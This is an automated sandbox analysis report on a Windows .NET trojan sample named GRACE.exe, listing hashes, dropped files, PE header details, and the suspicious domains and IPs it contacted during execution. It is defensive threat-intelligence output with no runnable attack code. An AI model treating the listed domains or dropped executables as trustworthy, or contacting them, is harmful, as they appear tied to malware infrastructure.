Overall analysis duration: 0h 12m 45s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: GRACE.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@12/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 13.2% (good quality ratio 12.1%)
• Quality average: 74.7%
• Quality standard deviation: 30.2%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.147.198.201, 172.217.23.36, 51.104.139.180, 92.122.144.200, 95.101.22.216, 95.101.22.224, 20.54.26.129, 67.27.158.126, 8.241.9.254, 8.248.139.254, 8.248.121.254, 8.241.122.126, 52.155.217.156
• Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
07:57:14 | API Interceptor | 216x Sleep call for process: GRACE.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

Domains

Match | Associated Sample Name / URL | Detection | Context (IP, bulleted under each row)
www.luxusgrotte.com | ordine.exe | malicious
• 217.160.0.171
shops.myshopify.com | v07PSzmSp9.exe | malicious
• 23.227.38.74
shops.myshopify.com | win32.exe | malicious
• 23.227.38.74
shops.myshopify.com | documents_0084568546754.exe | malicious
• 23.227.38.74
shops.myshopify.com | Payment _Arabian Parts Co BSC#U00a9.exe | malicious
• 23.227.38.74
shops.myshopify.com | MPbBCArHPF.exe | malicious
• 23.227.38.74
shops.myshopify.com | G0ESHzsrvg.exe | malicious
• 23.227.38.74
shops.myshopify.com | SecuriteInfo.com.Trojan.PackedNET.507.23078.exe | malicious
• 23.227.38.74
shops.myshopify.com | SecuriteInfo.com.Trojan.PackedNET.507.15470.exe | malicious
• 23.227.38.74
shops.myshopify.com | CQAOPIhHJZ.exe | malicious
• 23.227.38.74
shops.myshopify.com | SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203 _ 19-028-MP-010203.exe | malicious
• 23.227.38.74
shops.myshopify.com | PO20210120.exe | malicious
• 23.227.38.74
shops.myshopify.com | 0iEsxw3D7A.exe | malicious
• 23.227.38.74
shops.myshopify.com | z1k1U9Vnnw.exe | malicious
• 23.227.38.74
shops.myshopify.com | PO_610.20-21.A2424.UP_PDF.exe | malicious
• 23.227.38.74
shops.myshopify.com | RE.exe | malicious
• 23.227.38.74
shops.myshopify.com | Shipping Docs_pdf.exe | malicious
• 23.227.38.74
shops.myshopify.com | r.exe | malicious
• 23.227.38.74
shops.myshopify.com | PO81053.exe | malicious
• 23.227.38.74
shops.myshopify.com | January RFQ..exe | malicious
• 23.227.38.74
shops.myshopify.com | KuPBIsrqbO.exe | malicious
• 23.227.38.74

                                                ASN


JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GRACE.exe.log
Process: C:\Users\user\Desktop\GRACE.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1873
Entropy (8bit): 5.355036985457214
Encrypted: false
SSDEEP: 48:MxHKXeHKlEHU0YHKhQnouHIW7HKjovitHoxHhAHKzvr1qHj:iqXeqm00YqhQnouRqjoKtIxHeqzTwD
MD5: CDA95282F22F47DA2FDDC9E912B67FEF
SHA1: 67A40582A092B5DF40C3EB61A361A2D336FC69E0
SHA-256: 179E50F31095D0CFA13DCBB9CED6DEE424DFE8CEF8E05BDE1F840273F45E5F49
SHA-512: 1D151D92AE982D2149C2255826C2FFB89A475A1EB9B9FE93DC3706F3016CD6B309743B36A4D7F6D68F48CE25391FDA7A2BAE42061535EEA7862460424A3A2036
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Process: C:\Users\user\Desktop\GRACE.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 42080
Entropy (8bit): 6.2125074198825105
Encrypted: false
SSDEEP: 384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
MD5: F2A47587431C466535F3C3D3427724BE
SHA1: 90DF719241CE04828F0DD4D31D683F84790515FF
SHA-256: 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
SHA-512: E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
Reputation: moderate, very likely benign file
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.634685476400275
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: GRACE.exe
File size: 3215360
MD5: 9034acbb2742281523525d715a4ee566
SHA1: 605948c4bcd7a0290e46a37d841a09ab43fbec86
SHA256: cd63e20a002279934bc2ed4887d77605686a79f28f8114f9c01b678754a1e10a
SHA512: cc2b848101ea9d63fa02a442171fd250f4be76cc9c8d5f6b4c32062436b48931e9b931102c5c392217740cc06661205729f1b2afa7b0dda147c113df3ce454d9
SSDEEP: 49152:YTrD4RqOGxx0KVuy+Z28fUANfo8L81ucdopCpC9aXCmczjF10:gD4R5GxxHs8dSQoSucOCpC8Izj/0
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}#....................1.........N#1.. ........@.. ........................1...........`................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x71234e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp: 0xF9F237D [Sat Apr 22 10:05:49 1978 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3122fc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x314000 | 0x636 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x316000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x310354 | 0x310400 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x314000 | 0x636 | 0x800 | False | 0.35546875 | data | 3.70922095564 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x316000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x3140a0 | 0x3ac | data | |
RT_MANIFEST | 0x31444c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2018 >8<2D6?3IB:F?3DB7A>JA9B5
Assembly Version | 1.0.0.0
InternalName | GRACE.exe
FileVersion | 9.14.19.23
CompanyName | >8<2D6?3IB:F?3DB7A>JA9B5
Comments | 27J@CII8C76?EJ;
ProductName | <>I5?FEA3JEHG6CBH:C44DED
ProductVersion | 9.14.19.23
FileDescription | <>I5?FEA3JEHG6CBH:C44DED
OriginalFilename | GRACE.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/27/21-07:59:06.758330 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
01/27/21-08:00:11.194982 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
01/27/21-08:01:12.518069 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49754 | 23.227.38.74 | 192.168.2.3

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 27, 2021 07:58:44.645333052 CET | 49739 | 80 | 192.168.2.3 | 216.250.110.35
Jan 27, 2021 07:58:44.928340912 CET | 80 | 49739 | 216.250.110.35 | 192.168.2.3
Jan 27, 2021 07:58:44.928457975 CET | 49739 | 80 | 192.168.2.3 | 216.250.110.35
Jan 27, 2021 07:58:44.928558111 CET | 49739 | 80 | 192.168.2.3 | 216.250.110.35
Jan 27, 2021 07:58:45.210340023 CET | 80 | 49739 | 216.250.110.35 | 192.168.2.3
Jan 27, 2021 07:58:45.210391998 CET | 80 | 49739 | 216.250.110.35 | 192.168.2.3
Jan 27, 2021 07:58:45.210418940 CET | 80 | 49739 | 216.250.110.35 | 192.168.2.3
Jan 27, 2021 07:58:45.210614920 CET | 49739 | 80 | 192.168.2.3 | 216.250.110.35
Jan 27, 2021 07:58:45.210660934 CET | 49739 | 80 | 192.168.2.3 | 216.250.110.35
Jan 27, 2021 07:58:45.210788965 CET | 49739 | 80 | 192.168.2.3 | 216.250.110.35
Jan 27, 2021 07:58:45.492578983 CET | 80 | 49739 | 216.250.110.35 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 27, 2021 07:57:03.687182903 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:03.736371994 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:04.684554100 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:04.735389948 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:05.631925106 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:05.682622910 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:06.526653051 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:06.577647924 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:07.402307987 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:07.450220108 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:08.477905035 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:08.528554916 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:09.424428940 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:09.473896027 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:10.614949942 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:10.673142910 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:11.587152004 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:11.635020018 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:11.710526943 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:11.771256924 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:12.465265036 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:12.514309883 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:13.268241882 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:13.317176104 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:31.523591042 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:31.573447943 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:35.922370911 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:35.983253956 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:39.079822063 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:39.137626886 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:48.028091908 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:48.094542027 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:57:53.722011089 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:57:53.771976948 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:58:09.577709913 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:58:09.628099918 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:58:15.467978954 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:58:15.529508114 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:58:44.575615883 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:58:44.639400959 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:58:46.025794983 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:58:46.073719978 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:58:47.430965900 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:58:47.502331972 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:05.447269917 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:06.435502052 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:06.739923954 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:06.758213997 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:25.173145056 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:25.235316992 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:47.537916899 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:47.611829996 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:53.490791082 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:53.547228098 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:54.199328899 CET | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:54.261035919 CET | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:55.497503042 CET | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:55.554064989 CET | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:56.105572939 CET | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:56.167295933 CET | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:56.889492035 CET | 56130 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:56.950434923 CET | 53 | 56130 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:57.763669014 CET | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:57.819977999 CET | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:58.676543951 CET | 59420 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 07:59:58.735301018 CET | 53 | 59420 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 07:59:59.986825943 CET | 58784 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:00:00.045607090 CET | 53 | 58784 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 08:00:01.559737921 CET | 63978 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:00:01.616200924 CET | 53 | 63978 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 08:00:02.453038931 CET | 62938 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:00:02.514525890 CET | 53 | 62938 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 08:00:08.715852022 CET | 55708 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:00:09.726617098 CET | 55708 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:00:10.742414951 CET | 55708 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:00:10.826936007 CET | 53 | 55708 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 08:00:11.194005013 CET | 53 | 55708 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 08:00:30.982753992 CET | 56803 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:00:31.529903889 CET | 53 | 56803 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 08:00:51.924572945 CET | 57145 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:00:51.993443966 CET | 53 | 57145 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 08:01:12.236183882 CET | 55359 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:01:12.307245016 CET | 53 | 55359 | 8.8.8.8 | 192.168.2.3
Jan 27, 2021 08:01:32.660002947 CET | 58306 | 53 | 192.168.2.3 | 8.8.8.8
Jan 27, 2021 08:01:32.728943110 CET | 53 | 58306 | 8.8.8.8 | 192.168.2.3

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 27, 2021 07:59:06.758330107 CET | 192.168.2.3 | 8.8.8.8 | d067 | (Port unreachable) | Destination Unreachable
Jan 27, 2021 08:00:11.194982052 CET | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 27, 2021 07:58:44.575615883 CET | 192.168.2.3 | 8.8.8.8 | 0x4d08 | Standard query (0) | www.dl888.net | A (IP address) | IN (0x0001)
Jan 27, 2021 07:59:05.447269917 CET | 192.168.2.3 | 8.8.8.8 | 0x775a | Standard query (0) | www.hongreng.xyz | A (IP address) | IN (0x0001)
Jan 27, 2021 07:59:06.435502052 CET | 192.168.2.3 | 8.8.8.8 | 0x775a | Standard query (0) | www.hongreng.xyz | A (IP address) | IN (0x0001)
Jan 27, 2021 07:59:25.173145056 CET | 192.168.2.3 | 8.8.8.8 | 0xfea7 | Standard query (0) | www.hotvidzhub.download | A (IP address) | IN (0x0001)
Jan 27, 2021 07:59:47.537916899 CET | 192.168.2.3 | 8.8.8.8 | 0x6d9 | Standard query (0) | www.kornteengoods.com | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:08.715852022 CET | 192.168.2.3 | 8.8.8.8 | 0xe3ba | Standard query (0) | www.ludisenofloral.com | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:09.726617098 CET | 192.168.2.3 | 8.8.8.8 | 0xe3ba | Standard query (0) | www.ludisenofloral.com | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:10.742414951 CET | 192.168.2.3 | 8.8.8.8 | 0xe3ba | Standard query (0) | www.ludisenofloral.com | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:30.982753992 CET | 192.168.2.3 | 8.8.8.8 | 0xeb0d | Standard query (0) | www.11sxsx.com | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:51.924572945 CET | 192.168.2.3 | 8.8.8.8 | 0x50a | Standard query (0) | www.luxusgrotte.com | A (IP address) | IN (0x0001)
Jan 27, 2021 08:01:12.236183882 CET | 192.168.2.3 | 8.8.8.8 | 0xd988 | Standard query (0) | www.sterlworldshop.com | A (IP address) | IN (0x0001)
Jan 27, 2021 08:01:32.660002947 CET | 192.168.2.3 | 8.8.8.8 | 0x7eb8 | Standard query (0) | www.internetmarkaching.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 27, 2021 07:58:44.639400959 CET | 8.8.8.8 | 192.168.2.3 | 0x4d08 | No error (0) | www.dl888.net | | 216.250.110.35 | A (IP address) | IN (0x0001)
Jan 27, 2021 07:59:06.739923954 CET | 8.8.8.8 | 192.168.2.3 | 0x775a | Name error (3) | www.hongreng.xyz | none | none | A (IP address) | IN (0x0001)
Jan 27, 2021 07:59:06.758213997 CET | 8.8.8.8 | 192.168.2.3 | 0x775a | Name error (3) | www.hongreng.xyz | none | none | A (IP address) | IN (0x0001)
Jan 27, 2021 07:59:25.235316992 CET | 8.8.8.8 | 192.168.2.3 | 0xfea7 | Name error (3) | www.hotvidzhub.download | none | none | A (IP address) | IN (0x0001)
Jan 27, 2021 07:59:47.611829996 CET | 8.8.8.8 | 192.168.2.3 | 0x6d9 | Name error (3) | www.kornteengoods.com | none | none | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:10.826936007 CET | 8.8.8.8 | 192.168.2.3 | 0xe3ba | Server failure (2) | www.ludisenofloral.com | none | none | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:11.194005013 CET | 8.8.8.8 | 192.168.2.3 | 0xe3ba | Server failure (2) | www.ludisenofloral.com | none | none | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:31.529903889 CET | 8.8.8.8 | 192.168.2.3 | 0xeb0d | No error (0) | www.11sxsx.com | vps.temai.org | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 08:00:31.529903889 CET | 8.8.8.8 | 192.168.2.3 | 0xeb0d | No error (0) | vps.temai.org | gfw.cloud301.net | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 08:00:31.529903889 CET | 8.8.8.8 | 192.168.2.3 | 0xeb0d | No error (0) | gfw.cloud301.net | | 141.164.47.167 | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:31.529903889 CET | 8.8.8.8 | 192.168.2.3 | 0xeb0d | No error (0) | gfw.cloud301.net | | 158.247.206.75 | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:31.529903889 CET | 8.8.8.8 | 192.168.2.3 | 0xeb0d | No error (0) | gfw.cloud301.net | | 45.32.19.21 | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:31.529903889 CET | 8.8.8.8 | 192.168.2.3 | 0xeb0d | No error (0) | gfw.cloud301.net | | 45.32.11.11 | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:31.529903889 CET | 8.8.8.8 | 192.168.2.3 | 0xeb0d | No error (0) | gfw.cloud301.net | | 158.247.204.226 | A (IP address) | IN (0x0001)
Jan 27, 2021 08:00:51.993443966 CET | 8.8.8.8 | 192.168.2.3 | 0x50a | No error (0) | www.luxusgrotte.com | | 217.160.0.171 | A (IP address) | IN (0x0001)
Jan 27, 2021 08:01:12.307245016 CET | 8.8.8.8 | 192.168.2.3 | 0xd988 | No error (0) | www.sterlworldshop.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
Jan 27, 2021 08:01:12.307245016 CET | 8.8.8.8 | 192.168.2.3 | 0xd988 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
Jan 27, 2021 08:01:32.728943110 CET | 8.8.8.8 | 192.168.2.3 | 0x7eb8 | No error (0) | www.internetmarkaching.com | | 104.21.69.246 | A (IP address) | IN (0x0001)
Jan 27, 2021 08:01:32.728943110 CET | 8.8.8.8 | 192.168.2.3 | 0x7eb8 | No error (0) | www.internetmarkaching.com | | 172.67.216.18 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.dl888.net

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
